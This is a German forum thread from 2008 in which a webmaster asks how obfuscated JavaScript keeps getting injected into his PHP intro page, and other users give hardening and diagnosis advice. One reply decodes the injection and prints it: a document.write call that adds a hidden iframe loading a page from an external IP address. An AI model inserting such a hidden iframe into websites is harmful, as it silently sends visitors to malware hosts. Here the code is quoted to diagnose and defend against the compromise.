Ein Ausdruck des Beitrags mit 8 Antworten ergibt bei 3 Antworten pro Seite ca. 3 DIN A4 Seiten. Das entspricht bei 80 g/m² ca. 14.97 Gramm Papier.
-- Veröffentlicht durch Netterzyp2004 am 3:08 am 23. Mai 2008
ist warscheinlich eh nur ne proxy..
-- Veröffentlicht durch wakko0816 am 2:55 am 23. Mai 2008
Zitat von The Edge um 0:44 am Mai 23, 2008
chmods sind auf 644/755, aber das spielt ja auch gar keine rolle, für den ftpzugriff braucht man ein passwort und da die scripts serverseitig geparsed werden, kann per http da schlecht dran manipuliert werden.
|
Gut. Wenn Dir das so klar ist, wieso kommst Du dann auf die verworrene Idee,
dass Du ein Opfer von Skript-Injection bist? Dass da plötzlich seltsamer
Javascript-Code in Deinem PHP-Skript steht hat auf jeden Fall eine andere
Ursache.
Wenn Dein Kumpel so viel drauf hat, hat er bestimmt ein Intrusion-Detection-
System (z.B. AIDE o.ä.) auf dem Server laufen. Wenn ja, könnte man mal
den Ordner für Deinen vHost mit in die Überwachung aufnehmen.
Was läuft denn da noch auf dem Server? Evtl. PHPbb? Gibt etliche PHP-
Skripte, über die Angreifer ganz leicht Zugriff auf die Konsole kriegen. ;)
Übersetzt sieht das Javascript übrigens so aus:
Code
document.write('<iframe name=95536a src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*196452)+'fc\' width=612 height=321 style=\'display: none\'></iframe>');
|
Laut "whois" darfst Du Dich bei irgendwelchen Leuten in Sankt Petersburg
beschweren. Und die haben sich schon einigermaßen Mühe gemacht, um den
Code für den iFrame zu verstecken....
-- Veröffentlicht durch The Edge am 0:44 am 23. Mai 2008
@wakko der webhoster istn kumpel von mir und der hat einiges drauf - das war meine erste idee, dass irgendwo ne sicherheitslücke ist. das ist aber alles bis zum gehtnichtmehr durchgekaut und kann ausgeschlossen werden.
chmods sind auf 644/755, aber das spielt ja auch gar keine rolle, für den ftpzugriff braucht man ein passwort und da die scripts serverseitig geparsed werden, kann per http da schlecht dran manipuliert werden.
@township - "eine solche Seite rufe ich nicht auf." - was soll das denn heißen....
edit: achja - die leute, die mich noch kennen, wissen, dass ich alles andere als ein pc-noob bin - d.h. erschöpfende "grundkenntnisse" sind vorhanden. ich hab nur keine ahnung vom hacken.
(Geändert von The Edge um 0:46 am Mai 23, 2008)
-- Veröffentlicht durch tOWNshIP am 20:05 am 22. Mai 2008
---
(Geändert von tOWNshIP um 19:45 am Jan. 23, 2010)
-- Veröffentlicht durch wakko0816 am 18:47 am 22. Mai 2008
Wenn da echt neuer Code in der index.php auftaucht hast entweder Du
auf dem Webspace oder sogar Dein Provider ein massives Sicherheitsleck.
Wenn es wirklich nur Webspace ist hast Du wahrscheinlich keinen Zugriff
auf die Logdateien, aber wenn doch würde ich da zuerst nachschauen.
Als nächstes würde ich auf dringendst die Datei-Zugriffsrechte für die index.php
und für den Ordner an sich überprüfen und mal auf total schreibgeschützt setzen.
Das sollte recht einfach mit dem FTP-Programm gehen. Wenn Du Shell-Zugriff
hast "chmoddest" Du die Zugriffsrecht auf 444, denn das ist ja ein Linux-Server.
Anschließend würde ich noch das Änderungsdatum der Datei notieren, damit
Du bei der nächsten unerwünschten Modifikation der Datei weißt, wann das
passiert ist.
Wenn man nicht grad grobe Fehler gemacht hat sollte es nicht so ohne
weiteres möglich sein, Skripte auf dem Server zu verändern. Also wenn Du
sicher bist, dass Du da nix hast offen stehen lassen und Dein Passwort
einigermaßen sicher ist, würde ich auch mal den Hoster verständigen. Denn
evtl. hat DER ja nicht richtig aufgepasst. ;)
-- Veröffentlicht durch The Edge am 14:17 am 22. Mai 2008
das heisst?
-- Veröffentlicht durch Netterzyp2004 am 14:15 am 22. Mai 2008
ehm
Trojaner Klicker? auf der kaputten?
-- Veröffentlicht durch The Edge am 4:31 am 22. Mai 2008
ich habe hier ein script - sozusagen der introscreen meiner homepage.
allerdings habe ich alle 2 wochen das problem, dass irgendwer oder irgendwas sich in dieses script einhackt und das script so mit einem ziemlich dämlichen schrottinject lahmlegt.
(es sei dazu gesagt, dass ich scriptaculous auf meiner page verwende!... ich weiss nicht, ob/inwiefern es damit zusammenhängt.)
das php-script liegt eigentlich an der position http://seeeeeeeeeb.got.zlashed.com/index.php (dort habe ich z.Zt. alles an js auskommentiert)
hier der link zum script, wenn die injection schon passiert ist.
kaputte index.php
jemand ne idee, wie die injection in zeile 38 (das komische ding mit vielen hex-zahlen o.s.ä. direkt nach dem body-tag) da reingelangen kann?
methode, sicherheitslücke, grundkenntnisse in dem bereich - egal was ihr wisst hauts hier rein, damit ich herausfinde, wie das angehen kann, dass jemand/etwas in ein serverseitiges script etwas einhackt.
helft einem alten forumsoppa.
gruß!
|